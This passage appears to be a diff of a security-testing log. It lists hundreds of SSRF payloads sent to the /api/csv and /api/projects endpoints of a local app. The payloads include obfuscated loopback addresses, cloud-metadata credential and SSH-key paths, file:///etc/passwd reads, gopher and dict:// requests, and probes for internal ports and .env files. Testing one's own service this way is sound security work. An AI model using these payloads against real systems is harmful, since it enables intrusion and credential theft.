`http://localhost:4200/api/csv?url=localtest.me` +- Testing: `http://localhost:4200/api/csv?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/csv?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/csv?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/csv?url=2130706433%2F` +- Testing: `http://localhost:4200/api/csv?url=3232235521%2F` +- Testing: `http://localhost:4200/api/csv?url=3232235777%2F` +- Testing: `http://localhost:4200/api/csv?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/csv?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/csv?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/csv?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/csv?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/csv?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/csv?url=0%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.1` +- Testing: `http://localhost:4200/api/csv?url=localtest.me` +- Testing: `http://localhost:4200/api/csv?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/csv?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/csv?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/csv?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/csv?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/csv?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/csv?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/csv?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/csv?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.0.1.3` +- Testing: `http://localhost:4200/api/csv?url=0` +- Testing: `http://localhost:4200/api/csv?url=127.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.1` +- Testing: `http://localhost:4200/api/csv?url=localhost` +- Testing: `http://localhost:4200/api/csv?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/csv?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/csv?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/csv?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/csv?url=7F000001` +- Testing: `http://localhost:4200/api/csv?url=2130706433` +- Testing: `http://localhost:4200/api/csv?url=6425673729` +- Testing: `http://localhost:4200/api/csv?url=127001` +- Testing: `http://localhost:4200/api/csv?url=127_0._0_1` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/csv?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/csv?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/csv?url=localtest.me` +- Testing: `http://localhost:4200/api/csv?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/csv?url=127.127.127.127` +- Testing: `http://localhost:4200/api/csv?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/csv?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=0x7f000001` +- Testing: `http://localhost:4200/api/csv?url=017700000001` +- Testing: `http://localhost:4200/api/csv?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/csv?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/csv?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/csv?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/csv?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/csv?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/csv?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/csv?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254` +- Testing: `http://localhost:4200/api/csv?url=2852039166` +- Testing: `http://localhost:4200/api/csv?url=7147006462` +- Testing: `http://localhost:4200/api/csv?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/csv?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/csv?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/csv?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/csv?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/csv?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/csv?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/csv?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/csv?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/csv?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/csv?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/csv?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/csv?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/csv?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/csv?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/csv?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/csv?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/csv?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/csv?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/csv?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.0` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/csv?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/csv?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/csv?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/csv?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/csv?url=3232235521` +- Testing: `http://localhost:4200/api/csv?url=3232235777` +- Testing: `http://localhost:4200/api/csv?url=425.510.425.510` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/csv?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/csv?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/csv?url=instance-data` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A22` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A443` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A80` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/csv?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/csv?url=loopback` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A22` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A80` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A443` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/csv?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/csv?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/csv?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/csv?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/csv?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/csv?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/csv?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/csv?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/csv?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/csv?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/csv?url=127.1%3A80` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/csv?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/csv?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/csv?url=2130706433%2F` +- Testing: `http://localhost:4200/api/csv?url=3232235521%2F` +- Testing: `http://localhost:4200/api/csv?url=3232235777%2F` +- Testing: `http://localhost:4200/api/csv?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/csv?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/csv?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/csv?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/csv?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/csv?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/csv?url=0%2F` +- Testing: `http://localhost:4200/api/csv?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/projects +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/projects?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/projects?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/projects?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/projects?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/projects?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/projects?url=127.1%3A80` +- Testing: `http://localhost:4200/api/projects?url=0` +- Testing: `http://localhost:4200/api/projects?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A80` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/projects?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/projects?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/projects?url=127.127.127.127` +- Testing: `http://localhost:4200/api/projects?url=127.0.1.3` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.0` +- Testing: `http://localhost:4200/api/projects?url=2130706433` +- Testing: `http://localhost:4200/api/projects?url=017700000001` +- Testing: `http://localhost:4200/api/projects?url=0x7f000001` +- Testing: `http://localhost:4200/api/projects?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/projects?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/projects?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/projects?url=google.com.localhost` +- Testing: `http://localhost:4200/api/projects?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/projects?url=localtest.me` +- Testing: `http://localhost:4200/api/projects?url=http%3A%400%2F` +- Testing: 